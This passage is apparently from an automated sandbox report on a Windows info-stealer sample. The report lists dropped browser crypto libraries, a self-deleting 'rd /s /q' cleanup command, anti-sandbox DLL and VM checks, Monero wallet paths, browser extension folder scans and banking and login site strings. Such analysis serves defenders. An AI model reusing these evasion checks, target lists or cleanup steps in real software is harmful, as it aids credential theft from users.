                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                              Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49736 version: TLS 1.2
                              Source: unknown HTTPS traffic detected: 49.12.106.214:443 -> 192.168.2.5:49752 version: TLS 1.2

                              System Summary

                              Source: out.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              Source: C:\Users\user\Desktop\out.exe Code function: 0_2_0002145B GetCurrentProcess,NtQueryInformationProcess,0_2_0002145B
                              Source: C:\Users\user\Desktop\out.exe Code function: 0_2_6C47B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C47B700
                              Source: C:\Users\user\Desktop\out.exe Code function: 0_2_6C47B8C0 rand_s,NtQueryVirtualMemory,0_2_6C47B8C0
                              Source: C:\Users\user\Desktop\out.exe Code function: 0_2_6C47B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,0_2_6C47B910
                              Source: C:\Users\user\Desktop\out.exe Code function: 0_2_6C41F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C41F280
                              Source: out.exe, 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs out.exe
                              Source: out.exe, 00000000.00000002.2690538362.000000003DF10000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs out.exe
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs out.exe
                              Source: out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs out.exe
                              Source: out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs out.exe
                              Source: out.exe, 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs out.exe
                              Source: out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs out.exe
                              Source: out.exe, 00000000.00000002.2695905232.0000000049DE1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs out.exe
                              Source: out.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/21@2/3
                              Source: C:\Users\user\Desktop\out.exe Code function: 0_2_6C477030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,0_2_6C477030
                              Source: C:\Users\user\Desktop\out.exe Code function: 0_2_000314A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_000314A5
                              Source: C:\Users\user\Desktop\out.exe Code function: 0_2_00031807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,0_2_00031807
                              Source: C:\Users\user\Desktop\out.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199780418869[1].htm
                              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
                              Source: C:\Users\user\Desktop\out.exe File created: C:\Users\user\AppData\Local\Temp\delays.tmp
                              Source: C:\Users\user\Desktop\out.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini
                              Source: C:\Users\user\Desktop\out.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: unknown Process created: C:\Users\user\Desktop\out.exe "C:\Users\user\Desktop\out.exe"
                              Source: C:\Users\user\Desktop\out.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKEBFHIJECFI" & exit
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                              Source: C:\Users\user\Desktop\out.exe Section loaded: apphelp.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: wininet.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: rstrtmgr.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: ncrypt.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: ntasn1.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: dbghelp.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: iertutil.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: wldp.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: profapi.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: winhttp.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: mswsock.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: iphlpapi.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: winnsi.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: urlmon.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: srvcli.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: netutils.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: dnsapi.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: rasadhlp.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: fwpuclnt.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: schannel.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: mskeyprotect.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: msasn1.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: dpapi.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: gpapi.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: ncryptsslp.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: wbemcomn.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: amsi.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: userenv.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: version.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: sxs.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: ntmarta.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: mozglue.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: wsock32.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: vcruntime140.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: msvcp140.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: windowscodecs.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: propsys.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: windows.fileexplorer.common.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: ntshrui.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: linkinfo.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: edputil.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: wintypes.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: appresolver.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: bcp47langs.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: slc.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: sppc.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: pcacli.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: mpr.dll
                              Source: C:\Users\user\Desktop\out.exe Section loaded: sfc_os.dll
                              Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
                              Source: C:\Users\user\Desktop\out.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                              Source: Binary string: freebl3.pdb source: out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
                              Source: Binary string: mozglue.pdbP source: out.exe, 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
                              Source: Binary string: freebl3.pdbp source: out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
                              Source: Binary string: nss3.pdb@ source: out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
                              Source: Binary string: softokn3.pdb@ source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
                              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: out.exe, 00000000.00000002.2695905232.0000000049DE1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.0.dr
                              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: out.exe, 00000000.00000002.2690538362.000000003DF10000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.0.dr
                              Source: Binary string: nss3.pdb source: out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
                              Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: out.exe, 00000000.00000003.2392913103.000000000303A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2393034605.000000000303D000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2681976750.0000000027868000.00000002.00001000.00020000.00000000.sdmp, out.exe, 00000000.00000002.2682330461.0000000029D9E000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: mozglue.pdb source: out.exe, 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
                              Source: Binary string: softokn3.pdb source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr

                              Data Obfuscation

                              Source: C:\Users\user\Desktop\out.exeUnpacked PE file: 0.2.out.exe.27650000.3.unpack
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00038950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00038950
                              Source: nss3.dll.0.drStatic PE information: section name: .00cfg
                              Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
                              Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
                              Source: msvcp140.dll.0.drStatic PE information: section name: .didat
                              Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0004F142 push ecx; ret 0_2_0004F155
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00042D3B push esi; ret 0_2_00042D3D
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003DDB5 push ecx; ret 0_2_0003DDC8
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C44B536 push ecx; ret 0_2_6C44B549
                              Source: C:\Users\user\Desktop\out.exe File created: C:\ProgramData\nss3.dll
                              Source: C:\Users\user\Desktop\out.exe File created: C:\ProgramData\mozglue.dll
                              Source: C:\Users\user\Desktop\out.exe File created: C:\ProgramData\msvcp140.dll
                              Source: C:\Users\user\Desktop\out.exe File created: C:\ProgramData\freebl3.dll
                              Source: C:\Users\user\Desktop\out.exe File created: C:\ProgramData\vcruntime140.dll
                              Source: C:\Users\user\Desktop\out.exe File created: C:\ProgramData\softokn3.dll
                              Source: C:\Users\user\Desktop\out.exe Process information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              Source: Yara matchFile source: out.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.2.out.exe.20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.out.exe.20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.2039473209.0000000000050000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: out.exe PID: 1396, type: MEMORYSTR
                              Source: out.exeBinary or memory string: DIR_WATCH.DLL
                              Source: out.exeBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
                              Source: out.exeBinary or memory string: SBIEDLL.DLL
                              Source: out.exeBinary or memory string: API_LOG.DLL
                              Source: C:\Users\user\Desktop\out.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,0_2_0002180D
                              Source: C:\Users\user\Desktop\out.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
                              Source: C:\Users\user\Desktop\out.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
                              Source: C:\Users\user\Desktop\out.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
                              Source: C:\Users\user\Desktop\out.exe API coverage: 9.1 %
                              Source: C:\Windows\SysWOW64\timeout.exe TID: 1848 Thread sleep count: 81 > 30
                              Source: C:\Users\user\Desktop\out.exe Code function: 0_2_00030DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00030EEEh 0_2_00030DDB
                              Source: C:\Users\user\Desktop\out.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_0003543D
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00034CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,0_2_00034CC8
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00029D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00029D1C
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00021D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00021D80
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0002D5C6
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0002B5DF
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0002BF4D
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00035FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00035FD1
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0002B93F
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00035B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00035B0B
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0002CD37
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00035142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00035142
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00030FBA GetSystemInfo,wsprintfA,0_2_00030FBA
                              Source: C:\Users\user\Desktop\out.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                              Source: C:\Users\user\Desktop\out.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                              Source: C:\Users\user\Desktop\out.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                              Source: C:\Users\user\Desktop\out.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                              Source: C:\Users\user\Desktop\out.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                              Source: C:\Users\user\Desktop\out.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                              Source: out.exe, 00000000.00000002.2676579434.0000000002F9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWNO
                              Source: GCAKKE.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                              Source: GCAKKE.0.drBinary or memory string: discord.comVMware20,11696428655f
                              Source: GCAKKE.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                              Source: GCAKKE.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                              Source: GCAKKE.0.drBinary or memory string: global block list test formVMware20,11696428655
                              Source: GCAKKE.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                              Source: out.exe, 00000000.00000003.2297618303.0000000002F9B000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002F2E000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002F9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:-
                              Source: GCAKKE.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                              Source: GCAKKE.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                              Source: GCAKKE.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                              Source: GCAKKE.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                              Source: GCAKKE.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                              Source: GCAKKE.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                              Source: GCAKKE.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                              Source: GCAKKE.0.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                              Source: GCAKKE.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                              Source: GCAKKE.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                              Source: GCAKKE.0.drBinary or memory string: outlook.office.comVMware20,11696428655s
                              Source: GCAKKE.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                              Source: GCAKKE.0.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                              Source: GCAKKE.0.drBinary or memory string: AMC password management pageVMware20,11696428655
